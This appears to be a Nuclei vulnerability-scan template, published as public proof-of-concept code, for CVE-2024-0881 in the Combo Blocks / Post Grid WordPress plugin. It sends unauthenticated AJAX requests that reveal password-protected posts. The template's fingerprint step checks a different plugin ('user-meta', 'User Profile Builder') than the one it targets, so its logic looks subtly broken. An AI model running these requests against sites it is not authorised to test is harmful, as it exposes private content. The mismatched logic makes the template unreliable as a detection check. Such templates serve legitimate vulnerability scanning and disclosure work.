The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
PoC代码[已公开]
id: CVE-2024-0881
info:
name: Combo Blocks < 2.2.76 - Improper Access Control
author: s4e-io
severity: medium
description: |
The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
reference:
- https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0881
classification:
cve-id: CVE-2024-0881
cwe-id: CWE-284
epss-score: 0.13073
epss-percentile: 0.93867
metadata:
verified: true
max-request: 3
publicwww-query: "/wp-content/plugins/user-meta/"
tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"
matchers:
- type: word
internal: true
words:
- "User Profile Builder"
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '{"html"'
- '"<div class='
- '"pagination":'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502210086302b4e42dcba20c2aadacc4eae6b888ce158c3ffce1e6e5e8fd4d107545f8c02205c5d4148377eb5b95178eab9a928c1fb56cf9b62317f8781593ae10f446def40:922c64590222798bb761d5b6d8e72950